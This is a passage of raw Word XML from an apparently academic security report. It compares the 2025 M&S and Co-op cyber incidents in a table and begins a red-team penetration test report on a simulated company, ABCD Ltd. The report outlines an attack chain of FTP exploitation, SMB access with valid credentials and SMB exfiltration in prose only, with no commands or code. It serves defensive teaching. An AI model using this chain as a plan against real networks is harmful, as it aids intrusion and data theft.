              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access Vector</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1B947A8" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Social engineering of third-party helpdesk (TCS)</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BFEDC82" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Social engineering of internal helpdesk — same technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="719C48BD"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5D4B9462" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Time to Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF7F7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37885383" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>~8 weeks (February → April 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03F88F40" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Minutes — SOC auto-alert on anomalous account behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="7E9A9EAE"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139F673C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ransomware Deployed?</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654823EA" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DragonForce</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> on VMware </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, 24 Apr 2025</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1B96ADEA" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No — contained before detonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="06060E9F"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0CC66DA7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Customer Data Exfiltrated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF7F7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33695DA2" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes — names, emails, DOB (confirmed 13 May)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C39F201" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Yes — ~20 m records (confirmed by Co-op)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="45889CB0"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316B9FC9" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ecommerce Impact</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08DDBA70" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>46-day suspension of online orders</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D461B0D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Minimal — core services maintained throughout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="78DEDDCB"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24EFD30C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Financial Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF7F7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F80354C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>~£300 m profit impact; £750 m market cap loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14897875" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Significantly lower — not publicly quantified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="4CFDFAD8"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18EFA4EB" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network Segmentation</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3C967BB3" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Insufficient — flat legacy architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="741461EF" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Strong — micro-segmented zero-trust zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="02378528" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="468D1566" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>IR Preparedness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF7F7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D7AB73B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Overwhelmed; described as 'traumatic'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57D42FB8" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Well-rehearsed; enacted pre-planned playbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26FC04CF" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D51324C" w14:textId="26ABA52D" w:rsidR="00BE46BA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Table A.1: M&amp;S vs Co-op — comparative incident outcome summary. Sources: Parliamentary hearing (Jul 2025); MTI.com (Sep 2025); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>BlackFog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2025); Prelude Security (2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC836B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559A9A8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCE7FB9" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C06D969" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCF7F10" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4A74A2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F69534D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AD92E8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE99145" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B72E5E" w14:textId="71165632" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E99619" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE38DCB" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A7FD7A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027A7178" w14:textId="20C38A93" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc228127130"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>TASK 2 — Red Team Engagement: ABCD Ltd — Complete Penetration Testing Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="269FB42B" w14:textId="6B7C3414" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF9A67" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc228059714"/>
      <w:bookmarkStart w:id="72" w:name="_Toc228127131"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="526357E1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This report outlines the results of a red team engagement with a simulated environment of a mid-sized organisation, ABCD Ltd that has web-facing and internal systems. The purpose of the assessment was to check the security position of the organisation by emulating a realistic cyber-attack and determining the possible vulnerabilities that can be abused by enemies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F333F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The interaction proved to be a full chain attack starting with reconnaissance and moving on to exploitation, internal access, and exfiltration. The attacker was able to discover vulnerable services in the web server and used an old FTP service to have the initial access. This underscores the danger of unpatched systems and the need to update the systems with the latest software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CDCFED" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>After gaining access, the attacker attacked the internal Windows system. Administrative exploitation failed as the user was not allowed to access privileges, but the attacker could authenticate using valid credentials and list shared resources. It shows how dangerous it is to have a weak authentication mechanism and no strict access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AEA158" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>At the last phase, it was able to exfiltrate sensitive data off of the system via SMB-based file transfer. This means that there were no data protection protocols and monitoring controls, and the attacker was able to steal confidential information without being detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D709C89" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The evaluation revealed a number of serious security vulnerabilities, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14321F5F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Lack of regular patch management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA2CB1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Weak password policies and the absence of multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC17071" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>No intrusion detection or monitoring systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B039FB3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Insufficient access control mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05129197" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Absence of data loss prevention strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467EF33" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">Such vulnerabilities pose a severe risk of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
